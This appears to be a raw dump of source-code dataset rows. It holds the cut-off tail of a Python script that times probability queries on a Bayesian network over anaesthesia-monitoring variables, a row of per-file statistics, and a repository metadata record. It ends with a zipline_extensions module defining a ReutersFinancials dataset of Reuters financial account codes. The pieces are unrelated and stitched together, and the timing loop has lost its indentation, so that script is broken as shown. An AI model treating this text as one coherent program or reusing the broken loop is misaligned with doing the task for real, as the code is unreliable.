(CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'HIGH'}) & (PCWP << {'LOW'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'NORMAL'}) & (PCWP << {'LOW'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'LOW'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'LOW'}) & (PAP << {'HIGH'}) & (PCWP << {'HIGH'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'HIGH'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'LOW'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'NORMAL'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'NORMAL'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'HIGH'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'HIGH'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'HIGH'})]
runtime=np.zeros(100)
for i in range(100):
start_time=time.time()
query_prob=model.prob(events[i])
end_time = time.time()
print("--- %s seconds ---" % (end_time - start_time))
print(query_prob)
runtime[i]=end_time-start_time
print("single marginal time:%s"%np.mean(runtime[0:50]))
print("all marginal time:%s"%np.mean(runtime[50:100]))
| 104.234708 | 46,112 | 0.50825 | 7,546 | 73,277 | 4.932149 | 0.021601 | 0.020071 | 0.028535 | 0.041217 | 0.931243 | 0.920442 | 0.911333 | 0.848917 | 0.838653 | 0.713794 | 0 | 0.077233 | 0.166696 | 73,277 | 702 | 46,113 | 104.383191 | 0.532279 | 0 | 0 | 0.728732 | 0 | 0.274478 | 0.465344 | 0.0409 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.024077 | 0 | 0.024077 | 0.006421 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
01adeeda9af27adb823556b047460529eaa00205 | 26,570 | py | Python | zipline_extensions/pipeline/data/fundamental.py | quantrocket-llc/zipline-extensions | f89718e44c356d62fb1b08c9044685a2bcb91718 | [
"Apache-2.0"
] | 13 | 2017-11-21T15:36:14.000Z | 2021-05-02T19:30:00.000Z | zipline_extensions/pipeline/data/fundamental.py | quantrocket-llc/zipline-extensions | f89718e44c356d62fb1b08c9044685a2bcb91718 | [
"Apache-2.0"
] | null | null | null | zipline_extensions/pipeline/data/fundamental.py | quantrocket-llc/zipline-extensions | f89718e44c356d62fb1b08c9044685a2bcb91718 | [
"Apache-2.0"
] | 5 | 2018-11-18T03:41:25.000Z | 2020-06-11T14:07:11.000Z | # Copyright 2017 QuantRocket LLC - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from zipline.utils.numpy_utils import float64_dtype
from zipline.pipeline.data import Column, DataSet
class ReutersFinancials(DataSet):
"""
Dataset representing all available Reuters financials Chart of Account
(COA) codes. Utilizes annual fiscal periods.
Available financials:
Accounts Payable: LAPB
Accounts Receivable - Trade, Net: AACR
Accrued Expenses: LAEX
Accumulated Depreciation, Total: ADEP
Additional Paid-In Capital: QPIC
Allowance for Funds Used During Const.: NAFC
Amortization: SAMT
Amortization of Policy Acquisition Costs: EPAC
Capital Expenditures: SCEX
Capital Lease Obligations: LCLO
Cash: ACSH
Cash & Due from Banks: ACDB
Cash & Equivalents: ACAE
Cash Interest Paid: SCIP
Cash Payments: OCPD
Cash Receipts: OCRC
Cash Taxes Paid: SCTP
Cash and Short Term Investments: SCSI
Cash from Financing Activities: FTLF
Cash from Investing Activities: ITLI
Cash from Operating Activities: OTLO
Changes in Working Capital: SOCF
Common Stock, Total: SCMS
Cost of Revenue, Total: SCOR
Current Port. of LT Debt/Capital Leases: LCLD
DPS - Common Stock Primary Issue: DDPS1
Deferred Income Tax: SBDT
Deferred Policy Acquisition Costs: ADPA
Deferred Taxes: OBDT
Depreciation/Amortization: SDPR
Depreciation/Depletion: SDED
Diluted EPS Excluding ExtraOrd Items: SDBF
Diluted Net Income: SDNI
Diluted Normalized EPS: VDES
Diluted Weighted Average Shares: SDWS
Dilution Adjustment: SDAJ
ESOP Debt Guarantee: QEDG
Equity In Affiliates: CEIA
Financing Cash Flow Items: SFCF
Foreign Exchange Effects: SFEE
Fuel Expense: EFEX
Gain (Loss) on Sale of Assets: NGLA
Goodwill, Net: AGWI
Gross Profit: SGRP
Income Available to Com Excl ExtraOrd: CIAC
Income Available to Com Incl ExtraOrd: XNIC
Insurance Receivables: APRE
Intangibles, Net: AINT
Interest Exp.(Inc.),Net-Operating, Total: SINN
Interest Inc.(Exp.),Net-Non-Op., Total: SNIN
Interest Income, Bank: SIIB
Issuance (Retirement) of Debt, Net: FPRD
Issuance (Retirement) of Stock, Net: FPSS
Loan Loss Provision: ELLP
Long Term Debt: LLTD
Long Term Investments: SINV
Losses, Benefits, and Adjustments, Total: SLBA
Minority Interest: LMIN
Minority Interest: CMIN
Net Change in Cash: SNCC
Net Income: NINC
Net Income After Taxes: TIAT
Net Income Before Extra. Items: NIBX
Net Income Before Taxes: EIBT
Net Income/Starting Line: ONET
Net Interest Inc. After Loan Loss Prov.: SIAP
Net Interest Income: ENII
Net Investment Income: RNII
Net Loans: ANTL
Non-Cash Items: SNCI
Non-Interest Expense, Bank: SNIE
Non-Interest Income, Bank: SNII
Note Receivable - Long Term: ALTR
Notes Payable/Short Term Debt: LSTD
Operating Income: SOPI
Operations & Maintenance: EDOE
Other Assets, Total: SOAT
Other Bearing Liabilities, Total: SOBL
Other Current Assets, Total: SOCA
Other Current liabilities, Total: SOCL
Other Earning Assets, Total: SOEA
Other Equity, Total: SOTE
Other Investing Cash Flow Items, Total: SICF
Other Liabilities, Total: SLTL
Other Long Term Assets, Total: SOLA
Other Operating Expenses, Total: SOOE
Other Revenue, Total: SORE
Other, Net: SONT
Payable/Accrued: LPBA
Policy Liabilities: SPOL
Preferred Stock - Non Redeemable, Net: SPRS
Prepaid Expenses: APPY
Property/Plant/Equipment, Total - Gross: APTC
Property/Plant/Equipment, Total - Net: APPN
Provision for Income Taxes: TTAX
Realized & Unrealized Gains (Losses): RRGL
Redeemable Preferred Stock, Total: SRPR
Research & Development: ERAD
Retained Earnings (Accumulated Deficit): QRED
Revenue: SREV
Selling/General/Admin. Expenses, Total: SSGA
Short Term Investments: ASTI
Tangible Book Value per Share, Common Eq: STBP
Total Adjustments to Net Income: SANI
Total Assets: ATOT
Total Cash Dividends Paid: FCDP
Total Common Shares Outstanding: QTCO
Total Current Assets: ATCA
Total Current Liabilities: LTCL
Total Debt: STLD
Total Deposits: LDBT
Total Equity: QTLE
Total Extraordinary Items: STXI
Total Interest Expense: STIE
Total Inventory: AITL
Total Liabilities: LTLL
Total Liabilities & Shareholders' Equity: QTEL
Total Long Term Debt: LTTD
Total Operating Expense: ETOE
Total Preferred Shares Outstanding: QTPO
Total Premiums Earned: SPRE
Total Receivables, Net: ATRC
Total Revenue: RTLR
Total Short Term Borrowings: LSTB
Total Utility Plant, Net: SUPN
Treasury Stock - Common: QTSC
U.S. GAAP Adjustment: CGAP
Unrealized Gain (Loss): QUGL
Unusual Expense (Income): SUIE
To regenerate the column list and docstring:
>>> from quantrocket.fundamental import list_reuters_codes
>>> codes = list_reuters_codes(report_types=["financials"])
>>> attrs= "\n".join(["{0} = Column(float64_dtype) # {1}".format(k,v) for k,v in codes["financials"].items()])
>>> print(attrs)
>>> docstring = "\n".join(["{0}: {1}".format(v,k) for k,v in sorted(codes["financials"].items(), key=lambda x: x[1])])
>>> print(docstring)
"""
SCMS = Column(float64_dtype) # Common Stock, Total
VDES = Column(float64_dtype) # Diluted Normalized EPS
SDNI = Column(float64_dtype) # Diluted Net Income
SPRS = Column(float64_dtype) # Preferred Stock - Non Redeemable, Net
SOPI = Column(float64_dtype) # Operating Income
LAPB = Column(float64_dtype) # Accounts Payable
NINC = Column(float64_dtype) # Net Income
SOCL = Column(float64_dtype) # Other Current liabilities, Total
ETOE = Column(float64_dtype) # Total Operating Expense
SOLA = Column(float64_dtype) # Other Long Term Assets, Total
SREV = Column(float64_dtype) # Revenue
LAEX = Column(float64_dtype) # Accrued Expenses
XNIC = Column(float64_dtype) # Income Available to Com Incl ExtraOrd
SUIE = Column(float64_dtype) # Unusual Expense (Income)
APTC = Column(float64_dtype) # Property/Plant/Equipment, Total - Gross
SOBL = Column(float64_dtype) # Other Bearing Liabilities, Total
SNII = Column(float64_dtype) # Non-Interest Income, Bank
CEIA = Column(float64_dtype) # Equity In Affiliates
ERAD = Column(float64_dtype) # Research & Development
SDBF = Column(float64_dtype) # Diluted EPS Excluding ExtraOrd Items
SDWS = Column(float64_dtype) # Diluted Weighted Average Shares
SORE = Column(float64_dtype) # Other Revenue, Total
SCEX = Column(float64_dtype) # Capital Expenditures
ELLP = Column(float64_dtype) # Loan Loss Provision
ACSH = Column(float64_dtype) # Cash
AACR = Column(float64_dtype) # Accounts Receivable - Trade, Net
SCOR = Column(float64_dtype) # Cost of Revenue, Total
SUPN = Column(float64_dtype) # Total Utility Plant, Net
EIBT = Column(float64_dtype) # Net Income Before Taxes
AGWI = Column(float64_dtype) # Goodwill, Net
SCIP = Column(float64_dtype) # Cash Interest Paid
SDED = Column(float64_dtype) # Depreciation/Depletion
RNII = Column(float64_dtype) # Net Investment Income
ADPA = Column(float64_dtype) # Deferred Policy Acquisition Costs
SONT = Column(float64_dtype) # Other, Net
CGAP = Column(float64_dtype) # U.S. GAAP Adjustment
AINT = Column(float64_dtype) # Intangibles, Net
SGRP = Column(float64_dtype) # Gross Profit
SNIE = Column(float64_dtype) # Non-Interest Expense, Bank
EDOE = Column(float64_dtype) # Operations & Maintenance
SSGA = Column(float64_dtype) # Selling/General/Admin. Expenses, Total
SNIN = Column(float64_dtype) # Interest Inc.(Exp.),Net-Non-Op., Total
QTSC = Column(float64_dtype) # Treasury Stock - Common
OCPD = Column(float64_dtype) # Cash Payments
OBDT = Column(float64_dtype) # Deferred Taxes
TTAX = Column(float64_dtype) # Provision for Income Taxes
LPBA = Column(float64_dtype) # Payable/Accrued
QRED = Column(float64_dtype) # Retained Earnings (Accumulated Deficit)
SCSI = Column(float64_dtype) # Cash and Short Term Investments
SIAP = Column(float64_dtype) # Net Interest Inc. After Loan Loss Prov.
ANTL = Column(float64_dtype) # Net Loans
QTCO = Column(float64_dtype) # Total Common Shares Outstanding
LDBT = Column(float64_dtype) # Total Deposits
SANI = Column(float64_dtype) # Total Adjustments to Net Income
AITL = Column(float64_dtype) # Total Inventory
ATRC = Column(float64_dtype) # Total Receivables, Net
SBDT = Column(float64_dtype) # Deferred Income Tax
ASTI = Column(float64_dtype) # Short Term Investments
OTLO = Column(float64_dtype) # Cash from Operating Activities
OCRC = Column(float64_dtype) # Cash Receipts
RRGL = Column(float64_dtype) # Realized & Unrealized Gains (Losses)
STLD = Column(float64_dtype) # Total Debt
LTTD = Column(float64_dtype) # Total Long Term Debt
LTLL = Column(float64_dtype) # Total Liabilities
APPN = Column(float64_dtype) # Property/Plant/Equipment, Total - Net
SCTP = Column(float64_dtype) # Cash Taxes Paid
SLTL = Column(float64_dtype) # Other Liabilities, Total
DDPS1 = Column(float64_dtype) # DPS - Common Stock Primary Issue
SRPR = Column(float64_dtype) # Redeemable Preferred Stock, Total
ITLI = Column(float64_dtype) # Cash from Investing Activities
ONET = Column(float64_dtype) # Net Income/Starting Line
SDPR = Column(float64_dtype) # Depreciation/Amortization
STIE = Column(float64_dtype) # Total Interest Expense
APRE = Column(float64_dtype) # Insurance Receivables
SNCC = Column(float64_dtype) # Net Change in Cash
SFCF = Column(float64_dtype) # Financing Cash Flow Items
SINN = Column(float64_dtype) # Interest Exp.(Inc.),Net-Operating, Total
CMIN = Column(float64_dtype) # Minority Interest
SOAT = Column(float64_dtype) # Other Assets, Total
SNCI = Column(float64_dtype) # Non-Cash Items
LCLD = Column(float64_dtype) # Current Port. of LT Debt/Capital Leases
SDAJ = Column(float64_dtype) # Dilution Adjustment
SIIB = Column(float64_dtype) # Interest Income, Bank
QUGL = Column(float64_dtype) # Unrealized Gain (Loss)
NIBX = Column(float64_dtype) # Net Income Before Extra. Items
SOOE = Column(float64_dtype) # Other Operating Expenses, Total
SAMT = Column(float64_dtype) # Amortization
SFEE = Column(float64_dtype) # Foreign Exchange Effects
STXI = Column(float64_dtype) # Total Extraordinary Items
APPY = Column(float64_dtype) # Prepaid Expenses
EFEX = Column(float64_dtype) # Fuel Expense
QTPO = Column(float64_dtype) # Total Preferred Shares Outstanding
NGLA = Column(float64_dtype) # Gain (Loss) on Sale of Assets
SINV = Column(float64_dtype) # Long Term Investments
SOCA = Column(float64_dtype) # Other Current Assets, Total
FCDP = Column(float64_dtype) # Total Cash Dividends Paid
FPSS = Column(float64_dtype) # Issuance (Retirement) of Stock, Net
RTLR = Column(float64_dtype) # Total Revenue
ACDB = Column(float64_dtype) # Cash & Due from Banks
TIAT = Column(float64_dtype) # Net Income After Taxes
SOEA = Column(float64_dtype) # Other Earning Assets, Total
SOTE = Column(float64_dtype) # Other Equity, Total
SPOL = Column(float64_dtype) # Policy Liabilities
NAFC = Column(float64_dtype) # Allowance for Funds Used During Const.
QPIC = Column(float64_dtype) # Additional Paid-In Capital
QTLE = Column(float64_dtype) # Total Equity
ACAE = Column(float64_dtype) # Cash & Equivalents
FPRD = Column(float64_dtype) # Issuance (Retirement) of Debt, Net
ALTR = Column(float64_dtype) # Note Receivable - Long Term
SLBA = Column(float64_dtype) # Losses, Benefits, and Adjustments, Total
ATCA = Column(float64_dtype) # Total Current Assets
SOCF = Column(float64_dtype) # Changes in Working Capital
LCLO = Column(float64_dtype) # Capital Lease Obligations
LSTD = Column(float64_dtype) # Notes Payable/Short Term Debt
STBP = Column(float64_dtype) # Tangible Book Value per Share, Common Eq
SICF = Column(float64_dtype) # Other Investing Cash Flow Items, Total
ENII = Column(float64_dtype) # Net Interest Income
QTEL = Column(float64_dtype) # Total Liabilities & Shareholders' Equity
FTLF = Column(float64_dtype) # Cash from Financing Activities
LTCL = Column(float64_dtype) # Total Current Liabilities
SPRE = Column(float64_dtype) # Total Premiums Earned
LSTB = Column(float64_dtype) # Total Short Term Borrowings
